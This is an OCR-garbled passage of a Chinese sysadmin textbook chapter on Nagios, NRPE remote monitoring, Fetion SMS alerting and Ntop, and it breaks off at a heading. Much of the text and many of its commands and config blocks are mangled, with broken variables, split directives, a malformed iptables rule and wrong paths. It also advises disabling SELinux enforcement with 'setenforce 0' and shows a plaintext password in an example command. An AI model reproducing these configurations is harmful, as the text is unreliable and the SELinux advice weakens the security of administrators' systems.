如 图 10.1 所 示 为 Nagios 的 结构 图 。 


允许 用 户 通过 设计 实现 简单 的 插件 来 监控 自己 特定 的 服务 。 
当 被 监控 对 象 出 现 问题 时 ， 会 及 时 通知 管理 人 员 。 
事先 定义 事件 处 理 程序 ， 当 对 和 象 出 现 问题 时 自动 调用 对 应 的 处 理 程序 。 


警告 提示 和 日 志文 件 。 
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Nagios 系统 的 结构 图 


可 见 ，Nagios 采用 分 布 -集中 的 管理 模式 。 在 Nagios 服务 器 上 安装 Nagios 主 程序 ， 在 


被 监控 主机 上 安装 Nagios 代理 
监视 对 象 的 状态 。 


程序 。 通 过 Nagios 主 程序 和 Nagios 代理 程序 之 间 的 通信 ， 
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10.1.2 在 Linux 上 运行 Nagios 系统 


Nagios 系统 是 运行 在 Linux 或 者 UNIX 操 作 系 统 之 上 的 ,安装 前 确认 操作 系统 支持 TCP/IP 
协议 并 且 有 C 语言 编译 器 (如 GCC 等 ) 。 如 果 没 有 Web 服务 器 ， 例 如 Apache， 须 预先 安装 
它 。 在 Nagois 官方 网 站 http://www.nagios.org 下 载 Nagios 主 程序 、 插 件 和 安装 文档 ， 最 新 版 
本 是 Nagios 3.2。Nagios 是 开源 项 目 ， 它 的 安装 也 比较 简单 ， 按 照 文 档 一 步 步 执行 即 可 。 

如 果 Nagios 安装 在 /usr/local 目录 下 ， 完 成 后 执行 如 下 命令 


/usr/local/nagios/bin/nagios -v /usr/local/nagios/etc/nagios.cfg 


这 个 操作 用 来 预先 检查 Nagios 的 配置 是 否 正 确 。 如 果 没 有 错误 ， 则 开始 运行 Nagios: 


service nagios start 


上 面 的 命令 service nagios 后 面 可 以 跟 restart、stop 、reload 等 选项 ， 也 可 以 这 样 启 动 : 


/usr/local/nagios/bin/nagios -d /usr/local/nagios/etc/nagios.cfg 


Nagios 启动 正常 后 ， 登 录 到 Nagios，CGI 打开 浏览 器 ， 输 入 http:// 主 机 IP/nagios/， 如 果 
配置 正确 将 会 进入 到 证 的 监视 界面 ， 然 后 可 以 查看 没 人 情况 下 主机 被 监视 的 细节 数据 。 
如 果 出 现 提 示 “Internal Server Eror”， 这 可 能 是 本 机 上 安装 并 正在 运行 SELinux。 首 先 查看 
Linux 是 否 处 于 Enforcing 模式 getenforce， 然 后 把 Linux 置 为 Permissive 模式 setenforce 0。 
重新 打开 浏览 器 就 可 以 看 到 被 Nagios 监控 的 服务 了 。 

现在 访问 Nagios 的 服务 器 Web 界面 ， 界 面 如 图 10.2 所 示 。 
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图 10.2 访问 界面 
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10.1.3 ”运用 Nagios 实现 对 网 络 上 服务 器 的 监控 


1. 实现 原理 

处 于 网 络 中 的 各 种 服务 器 需要 管理 和 维护 ， 管 理 员 不 可 能 及 时 对 每 一 台 的 状态 都 进行 监 
控 ， 这 时 候 当 然 需要 借助 软件 的 功能 来 实现 了 。Nagios 的 功能 是 监控 服务 和 主机 ， 但 是 他 自 
身 并 不 包括 这 部 分 功能 ， 所 有 的 监控 、 检 测 功 能 都 是 通过 各 种 插件 来 完成 的 。 启 动 Nagios 后 ， 
它 会 周期 性 的 自动 调用 插件 去 检测 服务 器 状态 ， 同 时 Nagios 会 维持 一 个 队列 ， 所 有 插件 返回 
来 的 状态 信息 都 进入 队列 ，Nagios 每 次 都 从 队 首 开始 读 取信 息 ， 并 进行 处 理 ， 把 状态 结果 通 
过 Web 显示 出 来 。Nagios 提供 了 许多 插件 ， 利 用 这 些 插件 可 以 方便 地 监控 很 多 服务 状态 。 安 
装 完成 后 ， 在 Nagios 主 目录 下 的 /libexec 里 放 有 Nagios 自 带 的 可 以 使 用 的 所 有 插件 ， 如 
check_disk 是 检查 磁盘 空间 的 插件 ，check_load 是 检查 CPU 负载 的 插件 等 。 每 一 个 插件 可 以 
通过 运行 “./check_xxx -h” 来 查看 其 使 用 方法 和 功能 。Nagios 可 以 识别 4 种 状态 返回 信息 ， 
即 0 (OK) 表示 状态 正常 、1 (WARNING) 表示 出 现 一 定 的 异常 、2 (CRITICAL) 表示 出 现 
非常 严重 的 错误 、3 UNKNOWN) 表示 被 监控 的 对 象 已 经 停止 了 。Nagios 根据 插件 返回 的 值 
来 判断 监控 对 象 的 状态 ， 并 通过 Web 显示 出 来 ， 以 供 管理 员 及 时 发 现 故障 。 


2. 利用 Nagios 的 NRPE 插件 实现 网 络 上 服务 器 的 监控 


Nagios 系统 提供 了 一 个 插件 NRPE, Nagios 通过 周期 性 的 运行 它 来 获得 远 端 服务 器 的 各 种 
状态 信息 。 它 们 之 间 的 关系 如 图 10.3 所 示 。 


监控 主机 远程 Linux 主机 
图 10.3 Nagios 通过 NRPE 来 管理 远 端 服务 


操作 步骤 如 下 : 


Nagios 执行 安装 在 它 里 面 的 check_nrpe 插件 ， 并 告诉 check_nrpe 去 检测 哪些 服务 。 

加 通过 SSL、 check_nrpe 连接 远 端 主机 上 的 NRPE daemon。 

喃 NRPE 运行 本 地 的 各 种 插件 去 检测 本 地 的 服务 和 状态 (check_disk 等 ) 。 

贺 最 后 ,NRPE 把 检测 的 结果 传 给 主机 端的 check_nrpe, check_nrpe 再 把 结果 送 到 Nagios 
状态 队列 中 。 

加 Nagios 依次 读 取 队 列 中 的 信息 ， 再 把 结果 显示 出 来 。 


下 面 通过 一 个 监控 远 端 服务 器 CPU 负载 情况 的 实例 ， 研 究 如 何 实现 通过 NRPE 来 管理 
远 端 服务 器 。 假 设 有 一 台 远 端 服务 器 的 IP 是 10.20.0.110，Nagios 服务 主机 卫 是 : 
10.20.10.1。 它 们 都 已 经 安装 了 Nagios 系统 ， 主 机 通过 NRPE 检查 运行 中 的 服务 器 CPU 的 负 
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载 量 , 当 负 载 量 超过 80% 时 , 发 出 警告 (WARNING ) 报 告 ; 超过 95% 时 , 发 出 紧急 (CRITICAL) 
报告 。 在 Nagios 的 插件 中 ， 存 在 check load -w SARG1S -c SARG2$ 插 件 ， 通 过 其 查看 帮助 。 
当 Nagios 调用 它 时 ， 就 会 去 检查 对 象 主机 的 CPU 负载 ， 当 达到 $ARG1$ 指 定 的 数值 时 ， 就 会 
发 出 警告 (WARNING) ， 达 到 $ARG2$ 时 ， 发 出 紧急 报告 (CRITICAL) 。 

首先 ， 在 远 端 服务 器 上 的 修改 ， 步 又 如 下 : 


让 Nagios 用 户 拥有 对 如 下 文件 的 所 用 权 。 


chown nagios .nagios /usr/local/nagios 


chown -R nagios.nagios /usr/local/nagios/libexec 
然后 ， 如 果 没 有 安装 xinetd， 则 先 安装 xinetd。 


四 按照 Nagios 文档 安装 好 NRPE 插件 。 
贺 修改 文件 /etc/xinetd.d/nrpe: 


only_from = 127.0.0.1 10.20.10.1( 这 个 是 Nagios 主机 的 IP) 
NRPE 允许 以 上 IP 的 机 器 通过 NRPE 查询 服务 。 

加 在 /etc/service 文件 里 添加 : 

NRPE 5666/tcp #NRPE 


然后 重启 服务 : 


service xinetd restart 

贺 执行 “netstat -at | grep nrpe”， 如 果 出 现 : tcp00*:nrpe*:*LISTEN， 说 明 NRPE 监听 
已 经 成 功 启动 了 。 

国 执行 “/usr/local/nagios/libexec/check_nrpe -H localhost”， 如 果 出 现 NRPE v 2.8.1， 则 
表示 安装 成 功 。 

确认 本 地 防火 墙 允 许 远 端 服务 器 访问 NRPE daemon: 


iptables -IRH-Firewall-1-INPUT -p tcp -m tcp -dport 5666 -j ACCEPT 


service iptables save 
08| 打开 /usrlocal/nagios/etc/commands.cfg， 找 到 check load 服务 ， 修 改 如 下 : 


define command{ 

command name check_ server load 

command line $USER1$/check load -w 80% -c 95% 
) 


园 打开 /sr/local/nagios/etc/nrpe.cfg， 可 以 看 到 里 面 已 经 默认 定义 了 一 些 检 测 服务 ， 如 : 


/usr/local/nagios/libexec/check nrpe -H localhost -c check users 
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/usr/local/nagios/libexec/check nrpe -了 localhost -c check load 


/usr/local/nagios/libexec/check nrpe -H localhost -c check hdal 


注释 掉 除 check_load 以 外 的 其 他 服务 定义 。 
最 后 ， 进 行 Nagios 主机 上 的 修改 ， 步 骤 如 下 : 


在 Nagios 主机 上 ， 安 装 NRPE 插件 . 
四 打开 /usr/local/nagios/etc/command.cfg， 添 加 如 下 命令 : 


di 
CI 
CI 


} 


efine command{ 
ommand name check nrpe 
ommand line $USER1$/check nrpe -H 10.20.0.110 -c $ARG1$ 


咬 再 在 对 象 定义 的 配置 文件 里 (host.cfg 文件 ) ,修改 host 为 要 检测 的 主机 的 IP 地 址 ， 
然后 在 服务 中 添加 要 检测 的 命令 : 


define servicel{ 


ui 


se linux-service 


service description remote CPU Load 


[4 


} 


heck command check nrpe!check load 


在 nagios.cfg 主 配置 文件 中 ，cfg_file 值 为 host.cfg， 运 行 如 下 命令 : 


1 


usr/local/nagios/bin/nagios -v /usr/local/nagios/etc/nagios.cfg 


如 果 没 有 错误 ， 就 启动 Nagios: 


S 


ervice nagios start (restart, stop) 


加 打开 浏览 器 : http:// 主 机 IP/nagios， 可 以 看 到 所 监控 的 远 端 机 器 的 信息 了 (check_ 
server_load 的 返回 结果 ) ， 如 图 10.2 所 示 。 正 常 状态 用 绿色 表示 ， 一 旦 远 端 服务 器 负载 超过 


80%, 


10.: 


状态 信息 就 会 变 成 红色 ， 以 警告 管理 员 。 


4 对 Nagios 系统 的 评价 和 建议 


本 节 主 要 是 对 Nagios 的 远 端 监控 功能 的 应 用 和 研究 ， 要 想得到 更 加 复杂 的 服务 ， 还 需要 


进 一 


研究 它 的 文档 ， 并 且 不 断 去 尝试 ， 有 关 Nagios 的 更 多 功能 参见 本 章 其 他 相关 章节 。 和 


所 有 的 网 络 管理 工具 一 样 ， 要 想 充分 利用 Nagios 进行 全 面 的 监控 服务 ， 需 要 进行 相当 复杂 的 


设置 ， 
进 一 # 


并 且 需 要 在 运行 时 进行 调整 , 以 确保 所 提供 的 信息 是 正确 的 ,这些 都 会 随 着 对 Nagios 的 
了解 而 慢 慢 容易 起 来 。 虽 然 Nagios 配置 复杂 ， 但 是 一 旦 配置 成 功 后 它 的 操作 很 简单 ， 


大 部 分 是 基于 Web 的 操作 ， 而 且 易 于 扩展 ， 这 是 它 的 特点 。 它 还 可 以 很 轻松 地 与 其 他 地 工具 
进行 整合 和 扩展 , 可 以 从 其 他 的 应 用 软件 中 接收 数据 , 或 者 向 一 些 报告 引 警 或 者 工具 中 发 送 数 
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据 等 ， 例 如 ， 它 可 以 借助 mrtg 软件 来 定义 图 表 的 形式 、 显 示 监 控 的 服务 状态 等 ， 限 于 篇 幅 ， 
在 此 就 不 一 一 说 明了 。 

Nagios 是 一 个 非常 强大 的 工具 ， 在 它 运行 后 ， 它 能 够 让 你 的 IT 工作 变 得 更 加 容易 。 而 
相 比 商业 版 的 类 似 软件 , 它 也 具有 低 成 本 的 优势 。 自 然 , 最 好 的 特点 是 由 于 它 是 开放 源 代码 的 
软件 , 因此 我 们 随时 可 以 从 整个 Nagios 社区 中 获得 帮助 , 能 够 共享 社区 中 的 各 种 插件 和 经 验 。 
最 后 对 使 用 Nagios 系统 提出 一 点 建议 。 在 使 用 Nagios 之 前 ， 需 要 考虑 监控 哪些 服务 和 主机 ， 
并 对 它们 进行 统一 的 规划 ， 对 重要 资源 服务 进行 管理 ， 再 对 其 他 服务 进行 管理 。 在 配置 完 
Nagios 后 ， 保 存 其 配置 文档 ， 做 好 必要 的 注释 ， 这 将 会 使 所 监控 管理 的 资源 和 所 运行 的 插件 
更 加 清晰 ， 也 方便 其 他 人 能 够 在 已 有 的 Nagios 上 继续 工作 。 


10.2 运用 NRPE 扩展 Nagios 功能 


10.2.1 监控 原理 


NRPE 是 Nagios 的 一 个 功能 扩展 ， 它 可 在 远程 Linux/UNIX 主机 上 执行 插件 程序 , 通过 在 
远程 服务 器 上 安装 NRPE 插件 以 及 Nagios 插件 程序 , 来 向 Nagios 监控 平台 提供 该 服务 器 的 一 
些 本 地 情况 。 例 如 ，CPU 负载 、 内 存 使 用 、 硬 盘 使 用 等 。 


10.2.2 配置 Nagios 客户 端 


1. 安装 Nagios 插件 


在 Nagios 客户 端 主机 上 , 需要 安装 NRPE 和 Nagios 插件 。NRPE 插件 可 以 从 Nagios 官方 
网 站 下 载 到 ， 从 http://www.nagios.org/download/addons 下 载 最 新 版 本 NRPE-2.12.tar.gz， 然 后 
开始 安装 和 配置 ， 基 本 操作 如 下 : 


[root@nagios-client ~]#useradd -s /usr/sbin/nologin nagios 
[root@nagios-client ~]#tar zxvf nagios-plugins-1.4.14.tar.gz 
[root@nagios-client ~]#cd nagios-plugins-1.4.14 
[root@nagios-client ~]#./configure 

[root@nagios-client ~]#make 


[root@nagios-client ~]#make install 
设置 插件 目录 权限 : 


[root@nagios-client ~]#chown nagios.nagios /usr/local/nagios 


[root@nagios-client ~]#chown -R nagios.nagios /usr/local/nagios/libexec 


2. 安装 NRPE 插件 
在 客户 端 安装 NRPE 插件 的 过 程 要 比 在 服务 端 安 装 复杂 ， 因 为 NRPE 在 客户 端 是 作为 一 
个 守护 进程 运行 的 ， 操 作 如 下 : 
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[root@nagios-client ~]#tar zxvf NRPE-2.12.tar.gz 
[root@nagios-client ~]#cd NRPE-2.12 
[root@nagios-client ~]#./configure 
[root@nagios-client ~]#make all 
[root@nagios-client ~]#make install-plugin 
[root@nagios-client ~]#make install-daemon 


[root@nagios-client ~]#make install-daemon-config 


3. 配置 NRPE 


NRPE 的 配置 文件 为 /usr/local/nagios/etc/NRPE.cof。 

首先 找到 “server_address=127.0.0.1”， 将 后 面 的 地 址 改 为 客户 端 主机 的 他 地 址 ， 然 后 找 
到 : “allowed hosts=127.0.0.1” 一 行 ， 将 其 改 为 : “allowed_hosts=127.0.0.1”，Nagios 监控 
服务 器 的 地 址 或 域名 。 

修改 这 个 配置 的 作用 是 声明 合法 的 NRPE 服务 对 象 ， 没 有 在 这 里 指定 的 地 址 是 无 法 从 本 
机 的 NRPE 获得 服务 信息 的 。“Nagios 监控 服务 器 的 地 址 或 域名 ”可 以 是 瑟 地 址 ， 也 可 以 是 
域名 。 可 以 根据 自己 的 情况 设 定 。 


4. 启动 NRPE 守护 进程 
启动 NRPE 很 简单 ， 只 须 执行 如 下 操作 : 


/usr/local/nagios/bin/NRPE -c /usr/local/nagios/etc/nrpe.cfg -da 


建议 将 此 命令 加 入 到 /ete/rc local 文件 中 ， 这 样 就 可 以 在 开机 时 自动 运行 NRPE 守护 进 
程 了 。 
NRPE 守护 进程 默认 的 端口 为 5666， 通 过 如 下 命令 可 以 检测 端口 是 否 启动 : 


[root@nagios-client ~]# netstat -ant11grep 5666 
tcp 0 00.0.0.0:5666 GQa0s02* LISTEN 


可 以 看 到 ，NRPE 守护 进程 端口 5666 已 经 启动 了 。 

5. 测试 NRPE 功能 

首先 在 Nagios 客户 端 本 机 上 测试 ， 执 行 如 下 命令 : 
/usr/local/nagios/libexec/check nrpe -H 127.0.0.1 
如 果 正 常 ， 应 该 出 现 如 下 信息 : 


[root@nagios-client ~]# /usr/local/nagios/libexec/check nrpe -H 127.0.0.1 
NRPE v2.12 


正常 的 返回 值 为 被 监控 服务 器 上 安装 的 NRPE 的 版 本 信息 ,如 果 能 看 到 这 些 , 表示 NRPE 
已 经 正常 工作 了 。 


主机 监控 应 用 案例 第 10 党 


6. 定义 监控 服务 器 内 容 


要 监控 一 个 远程 服务 器 下 的 某 些 信息 ,首先 要 在 远程 服务 器 中 定义 监控 的 内 容 , 例如 ， 如 
果 要 监控 一 台 远 程 服务 器 上 的 当前 用 户 数 、CPU 负载 、 磁 盘 利用 率 、 交 换 空 间 使 用 情况 时 ， 
则 需要 在 nrpe.conf 中 定义 监控 内 容 : 


command[check users 1]=/usr/local/nagios/libexec/check users -w 5 -c 10 


command[check load 1]=/usr/local/nagios/libexec/check load -w 15,10,5 -c 


30,25,20 


command[check sda5 1]=/usr/local/nagios/libexec/check disk -w 20% -c 10% -p 


/dev/sda5 


command[check zombie procs 1]=/usr/local/nagios/libexec/check procs -w 5 -c 


10 -s 2 


command[check total procs_ 1]=/usr/local/nagios/libexec/check procs -w 150 -c 


200 


command[check swap_1]=/usr/local/nagios/libexec/check swap -w 20 -c 10 


其 中 ，command 后 面 括 


号 里 的 内 容 就 是 定义 的 变量 ， 变 量 名 可 以 随意 指定 。 


10.2.3 配置 Nagios 服务 器 端 


1. 安装 NRPE 插件 


NRPE 在 服务 器 端 安装 很 简单 ， 操 作 如 下 : 


[root@nagiosserver ~ 
[root@ nagiosserver 
[root@ nagiosserver 
[root@ nagiosserver 


[root@ nagiosserver 


]#tar zxvf nrpe-2.12.tar.gz 
~]#cd nrpe-2.12 
~]#./configure 

~]#make all 

~]#make install-plugin 


通过 “make install-plugin” 命 令 ,将 check_nrpe 插件 默认 安装 到 了 /usr/local/nagios/ libexec 


目录 下 。 


2. 测试 插件 与 客户 端 是 
在 Nagios 服务 器 端 〈 即 


否 能 正常 通信 
Nagios 监控 平台 ) 执行 如 下 指令 : 


/usr/local/nagios/1libexec/check_nrpe -H 客户 端 主机 地 址 


例如 : 


[root@nagiosserver 
192s168.12.251 
NRPE v2.12 


~]# /usr/local/nagios/libexec/check nrpe -H 


如 果 能 显示 如 上 的 输出 信息 ， 表 明 NRPE 可 以 与 客户 端正 常 通信 。 


3. 定义 一 个 check NRPE 监控 命令 
修改 /usr/local/nagios/etc/commands.cfg 文件 ， 添 加 如 下 内 容 : 


4. 添加 远程 主机 监控 
修改 /usr/local/nagios/etc/service.cfg， 添 加 如 下 监控 内 容 : 


5. 测试 和 启动 Nagios 服务 
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[root@nagiosserver ~]#/etc/init.d/nagios restart 


测试 和 启动 Nagios 服务 时 ， 所 有 主机 的 正常 状态 如 图 10.4 所 示 。 
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图 10.4 所 有 主机 的 正常 状态 


10.3 ”利用 飞信 实现 Nagios 短信 报警 功能 


10.3.1 飞信 简介 


-个 完善 的 Nagios 监控 系统 ， 故 障 报警 的 准确 性 和 及 时 性 显得 尤为 重要 ， 报 警 的 方式 有 
很 多 种 ， 可 以 通过 邮件 报警 、 手 机 短信 报警 、QQ 或 MSN 报警 等 ， 这 些 方式 各 有 优 缺 点 ， 通 
过 邮件 、QQ 或 MSN 进行 报警 通知 最 简单 和 实用 ， 但 是 及 时 性 不 好 。 通 过 手机 短信 方式 最 方 
便 ， 而 且 及 时 性 很 高 ， 但 是 短信 报警 需要 使 用 短信 猫 或 者 短信 网 关 ， 这 些 设 备 在 每 个 企业 不 一 
定 都 有 ， 并 且 还 要 支付 短信 费用 。 
飞信 ， 既 免费 ， 同 时 又 拥有 及 时 、 快 捷 的 报警 方式 。 要 使 用 飞信 功能 ， 首 先 手 机 要 开通 中 
国 移动 的 飞信 业务 ,目前 使 用 飞信 发 送 短信 是 免费 的 , 仅 需要 把 接收 短信 的 手机 和 飞信 发 送 手 
机 加 为 好 友 即 可 。 
Linux 飞信 客户 端 下 载 地 址 : 


http://libfetion-gui.googlecode.com/files/linux fetion vl.3.tar.gz 
10.3.2 ”安装 与 配置 飞信 
1. 安装 飞信 
这 里 假定 飞信 的 安装 目录 为 /asrlocalfetion， 操 作 如 下 : 
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[root@nagiosserver ~]#tar zxvf linux fetion v1.3.tar.gz 


[root@nagiosserver ~]# cp fx/* /usr/local/fetion 

执行 完毕 后 ，/usr/local/fetion/fetion 就 是 我 们 需要 的 飞信 客户 端 程序 。 
2. 配置 飞信 

配置 Fetion 所 需 的 动态 链接 库 : 


[root@nagiosserver ~]# vi /etc/ld.so.conf 
include ld.so.conf.d/*.conf 
/usr/local/fetion 


[root@localhost src]# ldconfig 


测试 Fetion 能 否 正 常 运 行 : 


[root@nagiosserver ~]#ldd /usr/local/fetion/fetion 
[root@nagiosserver ~]#/usr/local/fetion/fetion 
Usage: 

--mobile=[mobile] 

--sid=[sid] 

--pwd=[pwd] 

--config=[config file] *format:index mobile password 


3. Fetion 使 用 说 明 
表 10.1 所 示 的 参数 用 于 提供 登录 的 账号 和 密码 。 


表 10.1 登录 账号 和 密码 


参数 名 称 
--mobile=[ 手 机 号 ] 用 手机 号 登录 飞信 


用 飞信 号 登录 飞信 


--pwd=[ 密 码 ] 登录 飞信 密码 
--config-[ 文 件 名 ] 手机 号 、 密 码 的 存储 文件 
索引 
表 10.2 所 示 的 参数 用 来 定义 接收 者 的 属性 。 


表 10.2 参数 名 称 和 含义 
参数 名 称 表示 含义 
接收 消息 的 手机 号 /飞信 号 /URI， 支 持 多 个 号 码 ， 中 间 用 逗号 分 隔 ， 
--to=[ 手 机 号 /飞信 号 /URI] 如 果 知 道 对 方 的 URI， 则 只 需要 自己 在 对 方 好 友 列 表 ， 无 须 对 方 在 
自己 好 友 列表 就 能 发 送 
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参数 名 称 表示 含义 

--msg-utf8=[ 信 息 ] 指定 发 送 消息 格式 采用 UTF-8 编码 

指定 发 送 消息 格式 采用 GBK 编码 

以 文件 形式 指定 发 送 消息 的 内 容 

以 文件 形式 指定 发 送 消息 的 内 容 ， 文 件 格式 必须 是 GBK 编码 格式 
发 送 消息 类 型 ，“0” 表 示 普 通 消息 ，“1” 表 示 长 消息 ，“2” 表 示 
智能 短信 

查询 移动 公司 手机 段 


--msg-gb=[ 信 息 ] 
--file-utf8=[ 文 件 utfs 格式 ] 
--file-gb=[ 文 件 gb 格式 ] 


--msg-type=[0/1/2] 


4. 使 用 飞信 举例 


[root@nagiosserver ~]#/usr/local/fetion/fetion 一 -mobile=13488xXXXXX 


--pwd=chengxc123 --to 13888xxxxxx --msg-utf8="test fetion" 


这 个 例子 是 测试 飞信 能 否 成 功 发 送 短信 , 注意 , 发 送 对 象 必须 是 自己 的 好 友 或 自己 。 其 中 ， 
“13488xxxxxx” 是 发 送 人 的 手机 号 码 ，“13888xxxxxx” 是 接收 和 的 手机 号 码 。 
如 果 短 信 发 送 成 功 ， 应 该 能 看 到 如 下 返回 信息 : SIP-C/2.0 280 Send SMS OK。 


10.3.3 整合 飞信 到 Nagios 中 


1. 编辑 nsrlocalnagios/etc/command.cfg 文件 ， 添 加 以 下 内 容 : 


define command{ 
command name notify-service-by-sms # 定 义 了 一 个 服务 故障 时 发 送 报警 短信 的 指令 
command line /usr/local/fetion/fetion --mobile=xxxxxXXXXXXX 
——-pwd=xXxXxXXX --to=$CONTACTPAGERS$ --msg-utf8="$HOSTADDRESSS$"' 
S$HOSTALIAS$/$SERVICEDESCS$ is $SERVICESTATES$" 
} 


define command{ 
command name notify-host-by-sms # 定 义 了 一 个 主机 故障 时 发 送 报警 短信 的 指令 
command line /usr/local/fetion/fetion --mobile=xxxxxXxXxXXXXX 
—-pwd=xxxxxx --to=$CONTACTPAGERS$ --msg-utf8="Host $HOSTSTATES$ alert for $HOSTNAMES$ ! 
on '$DATETIMES$'" 
站 


之 . 修 改 /usr/local/nagios/etc/templates.cfg 文件 
找到 联系 人 为 generic-contact 的 定义 ， 修 改 后 的 内 容 如 下 : 


define contact{ 
name generic-contact 
service notification period 24x7 
host _ notification period 24x7 
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service notification options Wr 
heduled downtime events 
host notification options diur 
uled downtime events 
service notification commands 
notify-service-by-email,notify-service-by-sms 
host notification commands 
notify-host-by-email,notify-host-by-sms 
register 0 


} 
其 中 ， 加 粗 字 体 是 新 增 的 内 容 ， 也 就 是 在 command.cfg 文件 中 新 定义 的 两 个 指令 。 
3. 修改 /usrlocalnagios/etc/contacts.cfg 文件 
修改 联系 人 为 sasystem 的 定义 ， 修 改 后 的 内 容 如 下 : 


define contact{ 


contact name sasystem 

use generic-contact 
alias sa-system 
email cgweb@163.com 
pager 139xxxxxxxx 


} 


其 中 ， 加 粗 字体 部 分 为 新 增 内 容 ，“pager” 用 来 指定 接收 报警 短信 的 手机 号 码 ， 如 果 有 
多 个 手机 号 码 ， 每 个 号 码 之 问 用 逗号 分 隔 即 可 。 


10.4 运用 Ntop 监控 网 络 流量 


网 络 流量 反映 了 网 络 的 运行 状态 ,是 判别 网 络 运行 是 否 正常 的 关键 数据 ,在 实际 的 网 络 中 ， 
如 果 对 网 络 流量 控制 得 不 好 或 发 生 网 络 拥塞 ， 将 会 导致 网 络 吞 吐 量 下 降 、 网 络 性 能 降低 。 通 过 
流量 测量 不 仅 能 反映 网 络 设备 (如 路 由 器 、 交 换 机 等 ) 的 工作 是 否 正常 ， 而 且 能 反映 出 整个 网 
络 运行 的 资源 瓶颈 , 这样 管 理 人 员 就 可 以 根据 网 络 的 运行 状态 及 时 采取 故障 补救 措施 和 进行 相 
关 的 业务 部 署 来 提高 网 络 的 性 能 。 对 网 络 进行 流量 监测 分 析 ， 可 以 建立 网 络 流量 基准 ， 通 过 连 
接 会 话 数 的 跟踪 、 源 /目的 地 址 对 分 析 、TCP 流 的 分 析 等 ， 能 够 及 时 发 现 网 络 中 的 异常 流量 ， 
进行 实时 告警 ， 从 而 保障 网 络 安全 。 本 节 将 介绍 的 Ntop 便 可 以 提供 详细 的 网 络 流量 明细 表 。 


1. Ntop 简介 


Ntop, 顾名思义 就 是 Network Top 的 简称 ， 是 一 种 监控 网 络 流量 的 工具 , 用 NTOP 显示 网 
络 的 使 用 情况 比 其 他 一 些 网 管 软件 更 加 直观 、 详 细 。NTOP 可 以 列 出 每 个 节点 计算 机 的 网 络 带 
宽 利用 率 ， 从 而 帮助 我 们 管理 网 络 。 
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2. Ntop 主要 功能 
Ntop 主要 提供 以 下 一 些 功 能 : 


自动 从 网 络 中 识别 有 用 的 信息 ; 

将 截获 的 数据 包 转 换 成 易于 识别 的 格式 ; 
对 网 络 环境 中 通信 失败 的 情况 进行 分 析 ; 
探测 网 络 环境 中 的 通信 瓶颈 ; 

记录 网 络 通信 的 时 间 和 过 程 。 


Ntop 可 以 通过 分 析 网 络 流量 来 确定 网 络 上 存在 的 各 种 问题 ， 也 可 以 用 来 判断 是 否 有 黑客 
正在 攻击 网 络 系统 ; 还 可 以 很 方便 地 显示 出 特定 的 网 络 协议 、 占 用 大 量 带宽 的 主机 、 各 次 通信 
的 目标 主机 、 数 据 包 的 发 送 时 间 、 传 递 数据 包 的 延 时 等 详细 信息 。 


3. Ntop 支持 的 协议 


Ntop 比 MRTG 更 容易 安装 ， 如 果 用 手机 话费 来 比喻 流量 , MRTG 便 如 同 提供 总 费用 的 电 
话 账单 ， 而 Ntop 则 是 列 出 每 一 笔 费 用 的 明细 一 样 。 目 前 市 场 上 可 网 管 型 的 交换 机 、 路 由 器 都 
支持 SNMP 协议 ，Ntop 支持 简单 网 络 管理 协议 ， 所 以 可 以 进行 网 络 流量 监控 。Ntop 几乎 可 以 
监测 网 络 上 的 所 有 协议 :TCP/UDP/ICMP、(R)ARP、IPX、Telnet、DLC、 Decnet、.DHCP 一 BOOTP、 
AppleTalk、 Netbios、 TCP/UDP、 FTP、 HTTP、 DNS、 Telnet、 SMTP/POP/IMAP、 SNMP、 NNTP、 
NFS、X11、SSH 和 基于 P2P 技术 的 协议 eDonkey、Overnet、Bittorrent、Gnutella 。 


4. Ntop 支持 插件 


(1) ICMPWATCH 
用 于 端口 检测 很 多 人 都 已 经 知道 了 可 以 借助 NETSTAT -AN 来 查看 当前 的 连接 与 开放 的 
端口 ,但 NETSTAT 并 不 万 能 ， 比 如 Win2000 遭 到 OOB 攻击 的 时 候 ， 不 等 NETSTAT 就 已 经 
死机 了 。 为 此 , 出 现 了 一 种 特殊 的 小 工具 一 一 端口 监听 程序 。 端 口 监 听 并 不 是 一 项 复杂 的 技术 ， 
但 却 能 解决 一 些 局 部 问题 。 


(2) NetFlow 

近年 来 ， 很 多 服务 提供 商 一 直 使 用 NetFlow。 因 为 NetFlow 在 大 型 广域网 环境 里 具有 伸缩 
能 力 , 可 以 帮助 支持 对 等 点 上 的 最 佳 传输 流 , 同时 可 以 用 来 进行 建立 在 单项 服务 基础 之 上 的 基 
础 设施 最 优化 评估 ， 解 决 服务 和 安全 问题 方面 所 表现 出 来 的 价值 ， 为 服务 计 费 提供 基础 。 


(3) rrdPlugin 
用 于 生成 流量 图 。RRD 的 作者 ， 也 是 MRTG 的 作者 ，RRD 可 以 简单 的 说 是 MRTG 的 升 
级 版 ， 它 比 MRTG 更 灵活 ， 更 适合 用 shell、perl 等 程序 来 调用 ， 成 生 所 要 的 图 片 。 


(4) sFlow 
sFlow (RFC 3176) 是 基于 标准 的 最 新 网 络 导出 协议 ， 能 够 解决 当前 网 络 管理 人 员 面 临 的 
很 多 问题 。sFlow 已 经 成 为 一 项 线 速 运行 的 “永远 在 线 ” 技 术 ， 可 以 将 sFlow 技术 嵌入 到 网 络 
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路 由 器 和 交换 机 ASIC 芯片 中 。 与 使 用 镜像 端口 、 探 针 和 旁 路 监测 技术 的 传统 网 络 监视 解决 
方案 相 比 ，sFlow 能 够 明显 地 降低 实施 费用 ， 同 时 可 以 使 面向 每 一 个 端口 的 全 企业 网 络 监视 解 
决 方案 成 为 可 能 。 与 数据 包 采 样 技术 (如 RMON) 不 同 ，sFlow 是 一 种 导出 格式 ， 它 增加 了 关 
于 被 监视 数据 包 的 更 多 信息 , 并 使 用 嵌入 到 网 络 设备 中 的 sFlow 代理 转发 被 采样 数据 包 , 因此 
在 功能 和 性 能 上 都 超越 了 当前 使 用 的 RMON、RMON I 和 NetFlow 技术 。sFlow 技术 独特 之 
处 在 于 它 能 够 在 整个 网 络 中 ,以 连续 实时 的 方式 监视 每 一 个 端口 , 但 不 需要 镜像 监视 端口 ， 对 
整个 网 络 性 能 的 影响 也 非常 小 。 


10.4.1 ” 几 种 流量 采集 技术 的 比较 


流量 采集 技术 是 监控 网 络 流量 的 关键 技术 之 一 , 为 流量 分 析 提 供 数据 来 源 。 为 了 能 够 在 复 
杂 的 企业 网 络 中 有 效 地 分 析 网 络 流量 , 本 节 对 常见 的 四 种 网 络 流量 采集 技术 进行 讲解 ,并 分 析 
了 不 同 流量 采集 方式 的 优 缺 点 。 


1. Sniffer 


